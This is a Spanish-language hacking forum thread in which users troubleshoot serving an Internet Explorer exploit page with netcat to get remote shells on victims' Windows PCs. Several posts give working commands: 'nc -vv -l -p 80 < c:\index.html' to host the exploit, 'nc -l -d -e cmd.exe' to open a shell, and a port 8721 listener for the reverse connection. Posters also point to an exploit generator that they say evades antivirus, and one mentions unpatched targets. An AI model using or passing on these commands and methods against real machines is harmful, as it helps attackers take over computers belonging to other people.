SheKeL_C$
 Desconectado
Mensajes: 461
_-=[Sh3K3L_C$]=-_
|
Este exploit es todavia funcional (se k m vais a decir q el individuo lo puede tener parcheado) pero digo si es posible q el parche a podido inclurse en las repetidas veces q quiere actualizarse el windows¿?
|
|
|
|
|
En línea
|
|
|
|
|
ozzmadark
|
tengo una pregunta...a la victima se le cuelga la pc mir¡entras tiene el IE abierto solamente ?? o debe forzosamente reiniciar... Porque si es asi solo tendria acceso a la shell por unos segundos hasta que reinicie :S de todas formas gracias por el aporte...  |
|
|
|
|
En línea
|
|
|
|
panelmega
Desconectado
Mensajes: 1
|
En la consola se hicieron los procedimientos necesarios para ejecutar NETCAT, con otras redes el nc me funcionó perfectamente pero en esta nueva red nunca tuve el problema que aparece a continuación:
ul: forward host lookup failed: h_errno 11001: HOST_NOT_FOUND
ALGUIEN PUEDE DECIRME QUE DEBO HACER?
Gracias...
|
|
|
|
|
En línea
|
|
|
|
InfiniteLoop
Desconectado
Mensajes: 31
|
Siempre que sale HOST NOT FOUND és porque te dejas el '<' i el netcat cree que eso es un host, no un archivo, el comando es: nc -vv -l -p 80 < c:\archivo.html Parcheado no se si estará pero los htmls creados por: http://juaker.hopto.org/download/javaExploiter.rarno los detecta absolutamente ningún antivirus o almenos eso dice virustotal  A mi me interesaria porque tengo algunos objetivos que estoy seguro que no están parcheados. Mi pregunta es: Este programa conecta por reverse shell, pero a que puerto?!?!?! En el programa no lo dice y he buscado por todos sitios, además el puerto que decia FERNAN hace ya un año xD lo he probado en mi ordenador y no funciona. Todo bien, menos que no recojo la shell por no saber el puerto. Alguien tiene idea? |
|
|
|
|
En línea
|
|
|
|
BenRu
The Prodigy
Desconectado
Mensajes: 3.876
Primero la música y luego las palabras...
|
Este bug ya ha sido tapado en el 90% de los pcs...asi que ya ahi poco que hacer.
Un saludo
|
|
|
|
|
En línea
|
|
|
|
Neobius
Desconectado
Mensajes: 2.084
Viva Linux!
|
Un windows 98 es vulnerable????
|
|
|
|
|
En línea
|
 Todos somos muy ignorantes, lo que ocurre es que no todos ignoramos lo mismo. Albert Einstein Recuerda: El arca de Noe fue construida por aficionados, el titanic por profesionales http://neobius.blogspot.com |
|
|
ABDSO
Desconectado
Mensajes: 179
*El dolor es temporal, el orgullo es para siempre*
|
Y lo que había mencionado no recuerdo quien de hacerlo con un FTP en vez de con el Netcat es posible?? pq de ser posible creo q es más fácil con el FTP y así no nos complicamos la vida.
Ahh claro q con el FTP no te puedes hacer con el control. Cierto q tiene q ser con el Netcat
|
|
|
|
« Última modificación: 12 Marzo 2006, 23:48 por ABDSO »
|
En línea
|
|
|
|
informatico_25
Desconectado
Mensajes: 14
|
Hola, la secuencia que pedis para ingresar en el netcat es esta: nc -vv -l -p 80 < c:\index.html ¿verdad?.... Pues a mi me sigue dando el mismo error. http://img315.imageshack.us/img315/3398/cmd7js.jpgCon respecto al host creado en no-ip.com tampoco me sirve. Cuando pincho en él, me sale pagina no encontrada, pero no me da un error en el internet explorer. ¿puede ser porque tengo reparado ese bug ?. bueno, espero sus repuestas. Gracias por adelantado |
|
|
|
|
En línea
|
|
|
|
kicking people
Desconectado
Mensajes: 210
|
El error te lo tira porque escribes nc dos veces fijate  Tenés que escribir directamente: nc -vv -l -p 80 < C:\index.html ó nc
-vv -l -p 80 < C:\index.html
En cuanto al error que te tira el explorer... es porque el puerto no está a la escucha de conexiones entrantes (ya que el netcat tiró un error y no puso a la escucha el puerto 80), si el netcat no hubiese tirado error redireccionaría a la pag. index.hmtl Saludos |
|
|
|
|
En línea
|
|
|
|
informatico_25
Desconectado
Mensajes: 14
|
hola, gracias por solucionarme ese problema... ahora bien, si yo quiero hacer una shell remota a una maquina la cual ( por ejemplo ) tiene un ip dinamica, haria: 1º ( mi odenador ) nc -l -d -e cmd.exe -p (puerto) 2º nc -vv (ip victima) (puerto). Pero.... al hacer esto, me da un error. http://img20.imageshack.us/img20/3687/cmd15at.jpgNecesito ayuda, porque estoy hecho un lio. GRACIAS |
|
|
|
|
En línea
|
|
|
|
informatico_25
Desconectado
Mensajes: 14
|
hola, jeje tan dificil es lo q pido??? o es q lo q puse es una locura y es verdad q estoy realmente hecho un lio? jejeje . Bueno si es asi me gustaria q me ayudacen. Gracias a todos
|
|
|
|
|
En línea
|
|
|
|
micki
Desconectado
Mensajes: 12
|
seguro que eres informatico?
|
|
|
|
|
En línea
|
|
|
|
informatico_25
Desconectado
Mensajes: 14
|
Hola jajaja no lo soy, es la cuenta de mi hermano . Estoy hecho un lio o q? ayudadme q uno no nace sabiendo.
|
|
|
|
|
En línea
|
|
|
|
Divson
Desconectado
Mensajes: 18
|
Despues de googlear un poko he encontrado esto en una web en ingles
for the reverse connection by the exploit..
listen in the netcat on the port 8721..
Lo que viene a decirnos que para que la victima se conecte a nosotros tenemos que tener el netcat a la eschucha en el puerto 8721
La utilización del programa es bastante facil.
Pones tu ip donde te la pide y le das a generar.
Y lo unico que tienas que hacer es lo mismo que con el exploit de este tema. Poner el netcat en el puerto 80 y to eso. Saben estuve probando pero no me funca será por que estoy probando con una XP SP2 - IE 6.0  Y me baje un programita que mecionan post anteriores para generar el Exploint, pero tengo una duda...meciona que tengo que dejar el netcat a la eschucha en el puerto 8721 "como hago eso". |
|
|
|
|
En línea
|
|
|
|
transit
Desconectado
Mensajes: 74
|
Hola a todos.
Veran tengo un problema, la cuestion esque creo el index.html en mi unidad c y pongo el net cat en escuxa, hasta aquí todo bien. El problema viene cuando desde otra maquina que tengo en red local abro el index.html (exploit) que esta en mi pc, pero no m llega nada al puerto que tengo en escuxa, el otro pc usa ie 6.
que estoy aciendo mal?
Tambien probe con lo de no-ip.com pero me sale la pagina del router no la index que tengo en mi unidad c
Saludos
|
|
|
|
|
En línea
|
|
|
|
|
Autor
